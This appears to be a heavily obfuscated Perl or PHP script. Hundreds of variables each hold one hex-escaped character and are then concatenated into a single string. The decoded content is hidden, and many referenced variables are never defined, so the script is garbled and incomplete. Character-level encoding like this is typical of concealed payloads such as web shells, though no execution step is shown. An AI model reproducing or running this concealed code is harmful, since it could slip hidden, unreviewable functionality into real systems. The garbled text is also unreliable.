$qdq1401="\x20";$qdq1216="\x69";$qdq1307="\x6e";$qdq1010="\x22";$qdq1012="\x0a";$qdq943="\x28";$qdq1555="\x20";$qdq365="\x74";$qdq917="\x24";$qdq1558="\x20";$qdq637="\x24";
$qdq335="\x28";$qdq934="\x20";
$qdq1290="\x7d";$qdq461="\x77";$qdq936="\x5c";$qdq1404="\x72";$qdq336="\x24";$qdq1535="\x69";$qdq1111="\x61";$qdq1296="\x62";$qdq662="\x65";$qdq393="\x75";$qdq1326="\x61";$qdq397="\x40";$qdq1491="\x6f";$qdq459="\x77";$qdq983="\x6f";$qdq959="\x28";$qdq366="\x2c";$qdq1526="\x20";
$qdq810="\x65";$qdq660="\x6f";$qdq885="\x69";$qdq1161="\x40";$qdq1127="\x6d";$qdq1087="\x24";
$qdq231="\x29";$qdq439="\x61";
$qdq1442="\x75";$qdq131="\x65";$qdq89="\x72";$qdq58="\x4b";$qdq1504="\x20";$qdq1403="\x70";$qdq1194="\x28";$qdq319="\x3d";$qdq1441="\x74";$qdq1672="\x63";$qdq950="\x28";$qdq1320="\x20";$qdq1513="\x34";$qdq1026="\x5c";$qdq465="\x68";$qdq1229="\x61";
$qdq213="\x20";$qdq1203="\x3b";
$qdq445="\x65";$qdq211="\x20";$qdq170="\x74";$qdq1141="\x3d";$qdq1184="\x3d";$qdq1045="\x09";$qdq796="\x7d";$qdq902="\x22";$qdq1029="\x3d";$qdq1658="\x0a";
$qdq452="\x6b";$qdq1257="\x09";
$qdq71="\x73";$qdq1468="\x72";$qdq967="\x29";$qdq1626="\x74";$qdq1614="\x0a";$qdq1641="\x6d";
$qdq636="\x20";$qdq817="\x29";$qdq1178="\x6d";$qdq811="\x20";$qdq525="\x5f";$qdq116="\x2c";
$qdq378="\x64";$qdq203="\x40";$qdq437="\x72";
$qdq532="\x73";$qdq1635="\x76";$qdq1446="\x24";$qdq1461="\x68";$qdq1186="\x69";
$qdq1066="\x61";$qdq1560="\x72";$qdq1600="\x63";$qdq1147="\x09";$qdq1103="\x66";$qdq878="\x70";$qdq178="\x69";$qdq205="\x6e";
$qdq39="\x28";$qdq1370="\x3b";$qdq59="\x72";$qdq494="\x75";$qdq165="\x20";$qdq1019="\x64";
$qdq1530="\x73";$qdq773="\x28";$qdq841="\x76";
$qdq919="\x2e";
$qdq1057="\x65";$qdq1381="\x2b";
$qdq1027="\x24";$qdq268="\x20";
$qdq539="\x28";$qdq1694="\x65";$qdq432="\x69";$qdq581="\x65";
$qdq201="\x2c";$qdq1119="\x66";$qdq1456="\x0a";$qdq324="\x24";$qdq871="\x20";$qdq1651="\x74";
$qdq233="\x24";
$qdq921="\x3b";
$qdq1005="\x24";$qdq1689="\x0a";$qdq484="\x77";$qdq108="\x72";
$qdq858="\x28";$qdq1685="\x6e";$qdq261="\x6e";$qdq240="\x65";$qdq1209="\x78";$qdq1093="\x3b";$qdq887="\x20";$qdq850="\x22";$qdq1341="\x24";
$qdq1100="\x75";$qdq1714="\x0a";$qdq642="\x69";
$qdq1133="\x31";$qdq1414="\x2c";$qdq780="\x30";$qdq1321="\x69";$qdq264="\x72";$qdq1077="\x09";$qdq1417="\x6e";$qdq1474="\x69";
$qdq91="\x69";$qdq220="\x73";$qdq304="\x63";$qdq291="\x68";$qdq699="\x76";$qdq1332="\x29";$qdq1673="\x6c";
$qdq1483="\x20";$qdq574="\x76";$qdq1502="\x0a";$qdq458="\x6f";$qdq311="\x66";$qdq306="\x69";$qdq430="\x63";$qdq753="\x20";
$qdq323="\x20";
$qdq870="\x3c";$qdq1073="\x3b";$qdq893="\x6d";$qdq1678="\x4f";$qdq1237="\x6a";$qdq1018="\x6f";$qdq518="\x09";$qdq196="\x20";$qdq1500="\x61";$qdq772="\x74";$qdq1618="\x6e";$qdq513="\x61";
$qdq505="\x74";$qdq807="\x6c";$qdq1151="\x20";$qdq1241="\x20";$qdq292="\x20";$qdq1011="\x3b";$qdq968="\x20";$qdq1421="\x61";$qdq1459="\x20";$qdq6="\x2d";$qdq420="\x61";$qdq895="\x6f";$qdq18="\x63";$qdq503="\x65";$qdq1578="\x20";$qdq88="\x65";$qdq492="\x65";$qdq1069="\x6e";
$qdq583="\x3d";$qdq1638="\x5f";$qdq882="\x2b";$qdq1616="\x70";$qdq743="\x09";$qdq646="\x20";$qdq1189="\x28";$qdq78="\x72";$qdq1260="\x61";$qdq1072="\x65";$qdq759="\x69";
$qdq1698="\x61";$qdq735="\x24";$qdq28="\x69";
$qdq61="\x68";
$qdq325="\x69";$qdq1623="\x3e";$qdq449="\x72";
$qdq328="\x20";$qdq866="\x20";
$qdq1631="\x70";$qdq1114="\x73";$qdq561="\x0a";
$qdq314="\x20";
$qdq315="\x28";$qdq1192="\x6e";$qdq1344="\x72";$qdq389="\x0a";$qdq281="\x63";
$qdq1250="\x20";
$qdq981="\x6d";$qdq1091="\x64";$qdq701="\x72";$qdq1592="\x6d";
$qdq1564="\x6e";$qdq1371="\x20";$qdq1400="\x3d";$qdq929="\x64";$qdq613="\x22";$qdq1541="\x68";$qdq162="\x65";$qdq256="\x69";$qdq1582="\x24";$qdq1169="\x24";$qdq1017="\x63";$qdq524="\x72";$qdq542="\x73";$qdq120="\x6c";$qdq1546="\x64";$qdq1505="\x63";
$qdq1449="\x72";$qdq1615="\x6f";$qdq1671="\x0a";$qdq626="\x3d";
$qdq1333="\x2b";$qdq861="\x20";$qdq349="\x20";$qdq388="\x3b";$qdq1244="\x61";$qdq1585="\x20";
$qdq1490="\x79";$qdq1277="\x5b";$qdq688="\x25";$qdq310="\x09";$qdq49="\x65";$qdq579="\x61";$qdq1106="\x68";$qdq154="\x09";$qdq922="\x0a";
$qdq1692="\x24";
$qdq1228="\x24";$qdq422="\x64";
$qdq1548="\x2d";$qdq1477="\x20";$qdq224="\x64";$qdq1643="\x2d";$qdq1334="\x32";$qdq1006="\x69";$qdq1284="\x5d";$qdq1193="\x64";$qdq1410="\x22";
$qdq442="\x20";
$qdq738="\x29";$qdq1083="\x75";$qdq1035="\x5f";
$qdq363="\x69";$qdq1620="\x4f";$qdq614="\x22";$qdq954="\x28";
$qdq607="\x6f";
$qdq1554="\x23";$qdq744="\x24";$qdq833="\x20";
$qdq800="\x23";
$qdq481="\x73";$qdq610="\x20";
$qdq905="\x24";$qdq824="\x67";$qdq832="\x65";$qdq137="\x0a";$qdq1642="\x65";$qdq309="\x0a";
$qdq1105="\x73";$qdq1115="\x5f";$qdq1525="\x73";$qdq912="\x6d";$qdq1405="\x69";
$qdq683="\x5c";$qdq13="\x50";$qdq980="\x24";$qdq531="\x5f";$qdq1295="\x75";$qdq1586="\x3d";$qdq908="\x72";
$qdq148="\x72";$qdq1053="\x2e";$qdq702="\x5f";$qdq24="\x6f";$qdq368="\x73";$qdq32="\x65";$qdq802="\x63";$qdq1427="\x29";
$qdq143="\x65";$qdq298="\x20";$qdq537="\x6c";$qdq302="\x20";$qdq775="\x61";$qdq675="\x22";$qdq149="\x70";$qdq235="\x2a";$qdq986="\x20";$qdq689="\x30";$qdq1231="\x5b";$qdq373="\x72";$qdq332="\x67";$qdq1493="\x20";$qdq1182="\x6a";$qdq865="\x3b";
$qdq1588="\x6d";$qdq506="\x20";$qdq674="\x28";$qdq883="\x2b";$qdq1247="\x24";$qdq901="\x20";
$qdq450="\x61";$qdq1188="\x74";$qdq854="\x66";$qdq546="\x70";
$qdq1316="\x24";$qdq=$qdq0.
$qdq1.$qdq2.$qdq3.$qdq4.$qdq5.$qdq6.$qdq7.
$qdq8.$qdq9.
$qdq10.$qdq11.$qdq12.
$qdq13.
$qdq14.
$qdq15.$qdq16.
$qdq17.$qdq18.$qdq19.$qdq20.
$qdq21.$qdq22.$qdq23.$qdq24.
$qdq25.$qdq26.$qdq27.$qdq28.
$qdq29.$qdq30.$qdq31.$qdq32.$qdq33.$qdq34.$qdq35.$qdq36.
$qdq37.$qdq38.$qdq39.$qdq40.
$qdq41.$qdq42.
$qdq43.$qdq44.$qdq45.$qdq46.$qdq47.$qdq48.$qdq49.$qdq50.$qdq51.$qdq52.$qdq53.$qdq54.$qdq55.$qdq56.$qdq57.
$qdq58.$qdq59.$qdq60.$qdq61.$qdq62.$qdq63.$qdq64.$qdq65.$qdq66.$qdq67.$qdq68.$qdq69.$qdq70.$qdq71.$qdq72.
$qdq73.$qdq74.$qdq75.$qdq76.
$qdq77.$qdq78.$qdq79.$qdq80.
$qdq81.$qdq82.$qdq83.$qdq84.
$qdq85.$qdq86.$qdq87.$qdq88.$qdq89.$qdq90.$qdq91.$qdq92.$qdq93.$qdq94.$qdq95.
$qdq96.$qdq97.$qdq98.$qdq99.$qdq100.$qdq101.
$qdq102.$qdq103.$qdq104.$qdq105.$qdq106.$qdq107.$qdq108.$qdq109.$qdq110.
$qdq111.$qdq112.
$qdq113.$qdq114.$qdq115.$qdq116.$qdq117.$qdq118.$qdq119.$qdq120.$qdq121.$qdq122.$qdq123.$qdq124.$qdq125.
$qdq126.$qdq127.$qdq128.$qdq129.$qdq130.$qdq131.$qdq132.$qdq133.$qdq134.$qdq135.$qdq136.
$qdq137.$qdq138.$qdq139.$qdq140.$qdq141.
$qdq142.$qdq143.
$qdq144.$qdq145.$qdq146.
$qdq147.$qdq148.$qdq149.$qdq150.
$qdq151.
$qdq152.$qdq153.$qdq154.$qdq155.$qdq156.$qdq157.$qdq158.$qdq159.$qdq160.$qdq161.$qdq162.
$qdq163.$qdq164.$qdq165.
$qdq166.$qdq167.
$qdq168.
$qdq169.$qdq170.$qdq171.$qdq172.$qdq173.$qdq174.$qdq175.$qdq176.$qdq177.$qdq178.$qdq179.$qdq180.$qdq181.$qdq182.$qdq183.$qdq184.$qdq185.
$qdq186.
$qdq187.$qdq188.$qdq189.$qdq190.$qdq191.$qdq192.$qdq193.$qdq194.$qdq195.$qdq196.$qdq197.$qdq198.$qdq199.$qdq200.$qdq201.$qdq202.$qdq203.$qdq204.$qdq205.$qdq206.$qdq207.$qdq208.$qdq209.$qdq210.$qdq211.$qdq212.
$qdq213.$qdq214.
$qdq215.$qdq216.$qdq217.$qdq218.$qdq219.$qdq220.
$qdq221.$qdq222.$qdq223.$qdq224.$qdq225.
$qdq226.$qdq227.$qdq228.$qdq229.$qdq230.$qdq231.$qdq232.$qdq233.$qdq234.$qdq235.$qdq236.$qdq237.$qdq238.
$qdq239.$qdq240.$qdq241.$qdq242.$qdq243.$qdq244.$qdq245.$qdq246.$qdq247.$qdq248.$qdq249.$qdq250.$qdq251.$qdq252.
$qdq253.$qdq254.$qdq255.
$qdq256.$qdq257.$qdq258.
$qdq259.$qdq260.$qdq261.$qdq262.$qdq263.$qdq264.
$qdq265.$qdq266.$qdq267.$qdq268.$qdq269.$qdq270.$qdq271.$qdq272.$qdq273.$qdq274.$qdq275.$qdq276.$qdq277.$qdq278.$qdq279.$qdq280.$qdq281.$qdq282.$qdq283.$qdq284.$qdq285.$qdq286.$qdq287.$qdq288.$qdq289.$qdq290.$qdq291.$qdq292.$qdq293.$qdq294.$qdq295.$qdq296.
$qdq297.$qdq298.$qdq299.$qdq300.
$qdq301.$qdq302.$qdq303.$qdq304.
$qdq305.$qdq306.$qdq307.$qdq308.$qdq309.$qdq310.
$qdq311.$qdq312.$qdq313.$qdq314.$qdq315.$qdq316.$qdq317.$qdq318.$qdq319.$qdq320.$qdq321.
$qdq322.$qdq323.
$qdq324.
$qdq325.$qdq326.$qdq327.$qdq328.$qdq329.$qdq330.
$qdq331.$qdq332.
$qdq333.$qdq334.$qdq335.$qdq336.$qdq337.$qdq338.$qdq339.$qdq340.$qdq341.$qdq342.$qdq343.$qdq344.
$qdq345.$qdq346.$qdq347.$qdq348.$qdq349.$qdq350.
$qdq351.$qdq352.
$qdq353.$qdq354.$qdq355.$qdq356.$qdq357.
$qdq358.$qdq359.$qdq360.
$qdq361.$qdq362.$qdq363.$qdq364.$qdq365.$qdq366.$qdq367.$qdq368.$qdq369.$qdq370.
$qdq371.$qdq372.$qdq373.$qdq374.
$qdq375.$qdq376.$qdq377.$qdq378.
$qdq379.$qdq380.
$qdq381.$qdq382.$qdq383.$qdq384.
$qdq385.$qdq386.$qdq387.$qdq388.$qdq389.$qdq390.$qdq391.$qdq392.$qdq393.$qdq394.$qdq395.
$qdq396.$qdq397.$qdq398.$qdq399.$qdq400.$qdq401.$qdq402.$qdq403.$qdq404.$qdq405.$qdq406.$qdq407.$qdq408.$qdq409.$qdq410.
$qdq411.$qdq412.$qdq413.$qdq414.$qdq415.$qdq416.$qdq417.$qdq418.$qdq419.
$qdq420.
$qdq421.$qdq422.$qdq423.$qdq424.$qdq425.
$qdq426.$qdq427.$qdq428.$qdq429.$qdq430.$qdq431.$qdq432.
$qdq433.$qdq434.$qdq435.$qdq436.$qdq437.$qdq438.$qdq439.$qdq440.$qdq441.$qdq442.$qdq443.$qdq444.
$qdq445.$qdq446.$qdq447.$qdq448.
$qdq449.$qdq450.
$qdq451.$qdq452.$qdq453.$qdq454.$qdq455.$qdq456.
$qdq457.$qdq458.$qdq459.$qdq460.
$qdq461.$qdq462.
$qdq463.$qdq464.$qdq465.$qdq466.$qdq467.$qdq468.$qdq469.$qdq470.$qdq471.$qdq472.$qdq473.
$qdq474.
$qdq475.$qdq476.$qdq477.
$qdq478.$qdq479.$qdq480.$qdq481.$qdq482.$qdq483.$qdq484.$qdq485.$qdq486.
$qdq487.$qdq488.
$qdq489.$qdq490.
$qdq491.$qdq492.$qdq493.$qdq494.
$qdq495.$qdq496.
$qdq497.$qdq498.
$qdq499.$qdq500.$qdq501.$qdq502.$qdq503.$qdq504.
$qdq505.
$qdq506.$qdq507.$qdq508.$qdq509.
$qdq510.$qdq511.$qdq512.$qdq513.
$qdq514.$qdq515.$qdq516.
$qdq517.$qdq518.$qdq519.
$qdq520.
$qdq521.$qdq522.
$qdq523.$qdq524.
$qdq525.
$qdq526.
$qdq527.$qdq528.$qdq529.$qdq530.$qdq531.$qdq532.
$qdq533.$qdq534.$qdq535.$qdq536.$qdq537.
$qdq538.$qdq539.$qdq540.
$qdq541.$qdq542.$qdq543.$qdq544.$qdq545.$qdq546.$qdq547.$qdq548.$qdq549.
$qdq550.
$qdq551.
$qdq552.$qdq553.$qdq554.$qdq555.
$qdq556.$qdq557.
$qdq558.$qdq559.$qdq560.$qdq561.$qdq562.$qdq563.$qdq564.$qdq565.$qdq566.$qdq567.$qdq568.$qdq569.$qdq570.$qdq571.$qdq572.$qdq573.$qdq574.$qdq575.$qdq576.$qdq577.$qdq578.$qdq579.$qdq580.$qdq581.$qdq582.$qdq583.$qdq584.$qdq585.$qdq586.$qdq587.$qdq588.$qdq589.$qdq590.$qdq591.$qdq592.
$qdq593.$qdq594.$qdq595.$qdq596.$qdq597.$qdq598.
$qdq599.$qdq600.
$qdq601.$qdq602.$qdq603.$qdq604.$qdq605.$qdq606.
$qdq607.$qdq608.$qdq609.
$qdq610.
$qdq611.$qdq612.$qdq613.$qdq614.$qdq615.$qdq616.
$qdq617.$qdq618.
$qdq619.$qdq620.
$qdq621.$qdq622.$qdq623.$qdq624.
$qdq625.$qdq626.$qdq627.
$qdq628.$qdq629.$qdq630.
$qdq631.$qdq632.$qdq633.$qdq634.$qdq635.$qdq636.$qdq637.$qdq638.$qdq639.$qdq640.$qdq641.$qdq642.$qdq643.$qdq644.$qdq645.$qdq646.$qdq647.$qdq648.$qdq649.$qdq650.
$qdq651.$qdq652.$qdq653.$qdq654.$qdq655.$qdq656.$qdq657.$qdq658.$qdq659.$qdq660.$qdq661.
$qdq662.$qdq663.
$qdq664.$qdq665.$qdq666.$qdq667.$qdq668.$qdq669.$qdq670.
$qdq671.$qdq672.
$qdq673.$qdq674.$qdq675.$qdq676.
$qdq677.$qdq678.$qdq679.$qdq680.$qdq681.$qdq682.$qdq683.$qdq684.$qdq685.$qdq686.$qdq687.$qdq688.
$qdq689.$qdq690.$qdq691.$qdq692.$qdq693.
$qdq694.$qdq695.$qdq696.$qdq697.$qdq698.$qdq699.$qdq700.
$qdq701.$qdq702.$qdq703.$qdq704.$qdq705.$qdq706.$qdq707.$qdq708.$qdq709.$qdq710.$qdq711.$qdq712.$qdq713.$qdq714.$qdq715.$qdq716.
$qdq717.
$qdq718.$qdq719.$qdq720.$qdq721.$qdq722.$qdq723.$qdq724.$qdq725.$qdq726.$qdq727.$qdq728.$qdq729.
$qdq730.$qdq731.$qdq732.$qdq733.$qdq734.
$qdq735.
$qdq736.
$qdq737.$qdq738.
$qdq739.$qdq740.$qdq741.
$qdq742.$qdq743.$qdq744.
$qdq745.$qdq746.$qdq747.$qdq748.$qdq749.$qdq750.
$qdq751.$qdq752.$qdq753.$qdq754.$qdq755.$qdq756.
$qdq757.$qdq758.$qdq759.$qdq760.$qdq761.$qdq762.$qdq763.$qdq764.$qdq765.
$qdq766.$qdq767.$qdq768.$qdq769.$qdq770.$qdq771.
$qdq772.$qdq773.$qdq774.$qdq775.$qdq776.
$qdq777.$qdq778.$qdq779.$qdq780.
$qdq781.$qdq782.$qdq783.$qdq784.
$qdq785.$qdq786.$qdq787.$qdq788.$qdq789.$qdq790.$qdq791.$qdq792.$qdq793.$qdq794.$qdq795.$qdq796.$qdq797.$qdq798.$qdq799.$qdq800.
$qdq801.$qdq802.$qdq803.$qdq804.$qdq805.$qdq806.$qdq807.$qdq808.$qdq809.$qdq810.
$qdq811.$qdq812.$qdq813.$qdq814.$qdq815.$qdq816.
$qdq817.
$qdq818.$qdq819.$qdq820.$qdq821.$qdq822.
$qdq823.$qdq824.$qdq825.$qdq826.$qdq827.$qdq828.$qdq829.$qdq830.
$qdq831.$qdq832.
$qdq833.$qdq834.$qdq835.
$qdq836.
$qdq837.$qdq838.$qdq839.$qdq840.
$qdq841.$qdq842.$qdq843.$qdq844.$qdq845.$qdq846.$qdq847.$qdq848.$qdq849.$qdq850.$qdq851.$qdq852.$qdq853.$qdq854.$qdq855.$qdq856.$qdq857.$qdq858.$qdq859.$qdq860.$qdq861.$qdq862.$qdq863.$qdq864.$qdq865.
$qdq866.$qdq867.$qdq868.
$qdq869.$qdq870.$qdq871.$qdq872.$qdq873.$qdq874.$qdq875.$qdq876.$qdq877.
$qdq878.$qdq879.$qdq880.$qdq881.$qdq882.$qdq883.$qdq884.$qdq885.$qdq886.$qdq887.$qdq888.$qdq889.$qdq890.$qdq891.$qdq892.$qdq893.$qdq894.$qdq895.$qdq896.
$qdq897.$qdq898.$qdq899.$qdq900.
$qdq901.$qdq902.$qdq903.$qdq904.
$qdq905.$qdq906.$qdq907.$qdq908.
$qdq909.$qdq910.
$qdq911.$qdq912.
$qdq913.$qdq914.$qdq915.$qdq916.$qdq917.$qdq918.$qdq919.$qdq920.$qdq921.
$qdq922.$qdq923.$qdq924.$qdq925.$qdq926.$qdq927.
$qdq928.$qdq929.$qdq930.$qdq931.
$qdq932.$qdq933.$qdq934.$qdq935.$qdq936.
$qdq937.$qdq938.
$qdq939.$qdq940.$qdq941.$qdq942.$qdq943.$qdq944.$qdq945.$qdq946.$qdq947.$qdq948.$qdq949.$qdq950.$qdq951.
$qdq952.$qdq953.$qdq954.$qdq955.
$qdq956.$qdq957.$qdq958.
$qdq959.$qdq960.
$qdq961.$qdq962.$qdq963.$qdq964.
$qdq965.$qdq966.$qdq967.$qdq968.$qdq969.
$qdq970.$qdq971.$qdq972.
$qdq973.
$qdq974.$qdq975.$qdq976.
$qdq977.$qdq978.$qdq979.$qdq980.
$qdq981.$qdq982.$qdq983.$qdq984.$qdq985.$qdq986.$qdq987.
$qdq988.$qdq989.$qdq990.$qdq991.$qdq992.$qdq993.$qdq994.$qdq995.$qdq996.$qdq997.$qdq998.$qdq999.$qdq1000.$qdq1001.$qdq1002.$qdq1003.$qdq1004.
$qdq1005.$qdq1006.$qdq1007.$qdq1008.
$qdq1009.$qdq1010.$qdq1011.$qdq1012.$qdq1013.$qdq1014.$qdq1015.$qdq1016.$qdq1017.$qdq1018.$qdq1019.$qdq1020.$qdq1021.$qdq1022.$qdq1023.$qdq1024.$qdq1025.$qdq1026.$qdq1027.$qdq1028.
$qdq1029.$qdq1030.$qdq1031.$qdq1032.$qdq1033.$qdq1034.
$qdq1035.$qdq1036.$qdq1037.$qdq1038.
$qdq1039.$qdq1040.
$qdq1041.$qdq1042.$qdq1043.$qdq1044.$qdq1045.$qdq1046.$qdq1047.$qdq1048.$qdq1049.$qdq1050.$qdq1051.$qdq1052.$qdq1053.
$qdq1054.$qdq1055.
$qdq1056.$qdq1057.$qdq1058.$qdq1059.$qdq1060.$qdq1061.$qdq1062.$qdq1063.$qdq1064.$qdq1065.$qdq1066.$qdq1067.$qdq1068.
$qdq1069.
$qdq1070.
$qdq1071.$qdq1072.$qdq1073.$qdq1074.$qdq1075.$qdq1076.$qdq1077.
$qdq1078.$qdq1079.
$qdq1080.
$qdq1081.$qdq1082.$qdq1083.$qdq1084.$qdq1085.
$qdq1086.$qdq1087.$qdq1088.
$qdq1089.$qdq1090.$qdq1091.$qdq1092.
$qdq1093.$qdq1094.$qdq1095.$qdq1096.$qdq1097.$qdq1098.$qdq1099.$qdq1100.$qdq1101.
$qdq1102.$qdq1103.$qdq1104.$qdq1105.$qdq1106.$qdq1107.$qdq1108.$qdq1109.$qdq1110.$qdq1111.$qdq1112.$qdq1113.
$qdq1114.$qdq1115.$qdq1116.$qdq1117.$qdq1118.$qdq1119.$qdq1120.$qdq1121.$qdq1122.
$qdq1123.$qdq1124.$qdq1125.$qdq1126.$qdq1127.$qdq1128.$qdq1129.$qdq1130.$qdq1131.
$qdq1132.$qdq1133.$qdq1134.$qdq1135.$qdq1136.
$qdq1137.$qdq1138.$qdq1139.$qdq1140.$qdq1141.$qdq1142.$qdq1143.$qdq1144.$qdq1145.$qdq1146.$qdq1147.$qdq1148.$qdq1149.$qdq1150.
$qdq1151.$qdq1152.$qdq1153.$qdq1154.$qdq1155.
$qdq1156.$qdq1157.
$qdq1158.$qdq1159.$qdq1160.
$qdq1161.
$qdq1162.$qdq1163.$qdq1164.$qdq1165.$qdq1166.$qdq1167.$qdq1168.$qdq1169.$qdq1170.$qdq1171.$qdq1172.
$qdq1173.$qdq1174.$qdq1175.$qdq1176.$qdq1177.$qdq1178.$qdq1179.$qdq1180.$qdq1181.$qdq1182.
$qdq1183.$qdq1184.$qdq1185.$qdq1186.$qdq1187.$qdq1188.
$qdq1189.$qdq1190.
$qdq1191.$qdq1192.$qdq1193.$qdq1194.$qdq1195.$qdq1196.$qdq1197.$qdq1198.$qdq1199.$qdq1200.$qdq1201.
$qdq1202.$qdq1203.$qdq1204.
$qdq1205.$qdq1206.
$qdq1207.$qdq1208.$qdq1209.
$qdq1210.$qdq1211.
$qdq1212.$qdq1213.$qdq1214.$qdq1215.$qdq1216.$qdq1217.$qdq1218.$qdq1219.$qdq1220.
$qdq1221.$qdq1222.$qdq1223.$qdq1224.$qdq1225.
$qdq1226.$qdq1227.
$qdq1228.$qdq1229.$qdq1230.$qdq1231.$qdq1232.$qdq1233.
$qdq1234.$qdq1235.
$qdq1236.$qdq1237.$qdq1238.$qdq1239.$qdq1240.$qdq1241.$qdq1242.$qdq1243.$qdq1244.
$qdq1245.$qdq1246.$qdq1247.$qdq1248.$qdq1249.$qdq1250.
$qdq1251.$qdq1252.$qdq1253.$qdq1254.$qdq1255.$qdq1256.$qdq1257.$qdq1258.$qdq1259.$qdq1260.
$qdq1261.$qdq1262.$qdq1263.$qdq1264.$qdq1265.$qdq1266.$qdq1267.$qdq1268.$qdq1269.$qdq1270.$qdq1271.$qdq1272.$qdq1273.$qdq1274.$qdq1275.$qdq1276.$qdq1277.$qdq1278.$qdq1279.$qdq1280.$qdq1281.$qdq1282.$qdq1283.$qdq1284.$qdq1285.$qdq1286.$qdq1287.
$qdq1288.$qdq1289.$qdq1290.$qdq1291.$qdq1292.$qdq1293.$qdq1294.$qdq1295.$qdq1296.
$qdq1297.$qdq1298.$qdq1299.
$qdq1300.$qdq1301.$qdq1302.
$qdq1303.$qdq1304.
$qdq1305.
$qdq1306.$qdq1307.$qdq1308.
$qdq1309.$qdq1310.
$qdq1311.$qdq1312.$qdq1313.$qdq1314.$qdq1315.$qdq1316.$qdq1317.$qdq1318.$qdq1319.$qdq1320.$qdq1321.$qdq1322.$qdq1323.$qdq1324.
$qdq1325.$qdq1326.
$qdq1327.$qdq1328.$qdq1329.$qdq1330.$qdq1331.$qdq1332.
$qdq1333.$qdq1334.$qdq1335.$qdq1336.$qdq1337.$qdq1338.$qdq1339.$qdq1340.$qdq1341.$qdq1342.$qdq1343.$qdq1344.
$qdq1345.
$qdq1346.$qdq1347.$qdq1348.$qdq1349.$qdq1350.$qdq1351.$qdq1352.$qdq1353.$qdq1354.$qdq1355.$qdq1356.$qdq1357.$qdq1358.$qdq1359.
$qdq1360.
$qdq1361.$qdq1362.$qdq1363.$qdq1364.$qdq1365.$qdq1366.$qdq1367.$qdq1368.
$qdq1369.$qdq1370.$qdq1371.$qdq1372.$qdq1373.$qdq1374.$qdq1375.$qdq1376.$qdq1377.$qdq1378.$qdq1379.$qdq1380.$qdq1381.$qdq1382.$qdq1383.$qdq1384.$qdq1385.$qdq1386.$qdq1387.$qdq1388.
$qdq1389.$qdq1390.$qdq1391.$qdq1392.$qdq1393.$qdq1394.$qdq1395.
$qdq1396.$qdq1397.$qdq1398.$qdq1399.$qdq1400.
$qdq1401.$qdq1402.$qdq1403.$qdq1404.$qdq1405.$qdq1406.$qdq1407.$qdq1408.
$qdq1409.$qdq1410.
$qdq1411.$qdq1412.$qdq1413.$qdq1414.
$qdq1415.$qdq1416.$qdq1417.$qdq1418.$qdq1419.
$qdq1420.
$qdq1421.$qdq1422.$qdq1423.$qdq1424.$qdq1425.$qdq1426.$qdq1427.$qdq1428.$qdq1429.$qdq1430.
$qdq1431.
$qdq1432.
$qdq1433.$qdq1434.$qdq1435.$qdq1436.$qdq1437.$qdq1438.$qdq1439.$qdq1440.
$qdq1441.$qdq1442.
$qdq1443.$qdq1444.$qdq1445.$qdq1446.
$qdq1447.$qdq1448.
$qdq1449.$qdq1450.$qdq1451.$qdq1452.$qdq1453.$qdq1454.$qdq1455.$qdq1456.
$qdq1457.$qdq1458.$qdq1459.$qdq1460.
$qdq1461.$qdq1462.$qdq1463.$qdq1464.$qdq1465.$qdq1466.$qdq1467.$qdq1468.
$qdq1469.$qdq1470.
$qdq1471.$qdq1472.
$qdq1473.$qdq1474.$qdq1475.$qdq1476.
$qdq1477.
$qdq1478.$qdq1479.$qdq1480.
$qdq1481.$qdq1482.
$qdq1483.$qdq1484.$qdq1485.
$qdq1486.$qdq1487.$qdq1488.$qdq1489.$qdq1490.
$qdq1491.$qdq1492.$qdq1493.$qdq1494.
$qdq1495.$qdq1496.$qdq1497.$qdq1498.
$qdq1499.$qdq1500.
$qdq1501.$qdq1502.$qdq1503.$qdq1504.
$qdq1505.$qdq1506.$qdq1507.$qdq1508.
$qdq1509.$qdq1510.$qdq1511.$qdq1512.
$qdq1513.$qdq1514.$qdq1515.$qdq1516.
$qdq1517.$qdq1518.$qdq1519.$qdq1520.$qdq1521.$qdq1522.$qdq1523.$qdq1524.
$qdq1525.
$qdq1526.$qdq1527.$qdq1528.$qdq1529.$qdq1530.
$qdq1531.$qdq1532.$qdq1533.$qdq1534.$qdq1535.$qdq1536.$qdq1537.$qdq1538.$qdq1539.$qdq1540.$qdq1541.$qdq1542.$qdq1543.
$qdq1544.$qdq1545.$qdq1546.$qdq1547.$qdq1548.
$qdq1549.
$qdq1550.$qdq1551.$qdq1552.$qdq1553.$qdq1554.
$qdq1555.$qdq1556.$qdq1557.$qdq1558.$qdq1559.$qdq1560.
$qdq1561.$qdq1562.$qdq1563.
$qdq1564.$qdq1565.$qdq1566.$qdq1567.$qdq1568.
$qdq1569.$qdq1570.$qdq1571.$qdq1572.
$qdq1573.$qdq1574.$qdq1575.$qdq1576.$qdq1577.$qdq1578.$qdq1579.$qdq1580.
$qdq1581.$qdq1582.$qdq1583.$qdq1584.$qdq1585.
$qdq1586.
$qdq1587.$qdq1588.$qdq1589.$qdq1590.$qdq1591.$qdq1592.$qdq1593.$qdq1594.
$qdq1595.$qdq1596.
$qdq1597.$qdq1598.$qdq1599.$qdq1600.$qdq1601.$qdq1602.$qdq1603.$qdq1604.$qdq1605.$qdq1606.$qdq1607.$qdq1608.$qdq1609.$qdq1610.$qdq1611.$qdq1612.$qdq1613.$qdq1614.$qdq1615.
$qdq1616.$qdq1617.$qdq1618.$qdq1619.$qdq1620.$qdq1621.$qdq1622.$qdq1623.$qdq1624.$qdq1625.$qdq1626.
$qdq1627.$qdq1628.$qdq1629.$qdq1630.$qdq1631.$qdq1632.
$qdq1633.$qdq1634.$qdq1635.$qdq1636.$qdq1637.$qdq1638.
$qdq1639.
$qdq1640.$qdq1641.
$qdq1642.$qdq1643.$qdq1644.
$qdq1645.$qdq1646.$qdq1647.$qdq1648.$qdq1649.$qdq1650.$qdq1651.$qdq1652.$qdq1653.$qdq1654.$qdq1655.
$qdq1656.$qdq1657.$qdq1658.
$qdq1659.
$qdq1660.$qdq1661.$qdq1662.$qdq1663.$qdq1664.$qdq1665.
$qdq1666.$qdq1667.$qdq1668.$qdq1669.$qdq1670.$qdq1671.$qdq1672.
$qdq1673.$qdq1674.$qdq1675.$qdq1676.$qdq1677.$qdq1678.$qdq1679.$qdq1680.$qdq1681.$qdq1682.$qdq1683.$qdq1684.$qdq1685.$qdq1686.$qdq1687.$qdq1688.$qdq1689.$qdq1690.$qdq1691.$qdq1692.$qdq1693.$qdq1694.
$qdq1695.$qdq1696.$qdq1697.$qdq1698.$qdq1699.$qdq1700.$qdq1701.$qdq1702.$qdq1703.$qdq1704.$qdq1705.$qdq1706.$qdq1707.$qdq1708.
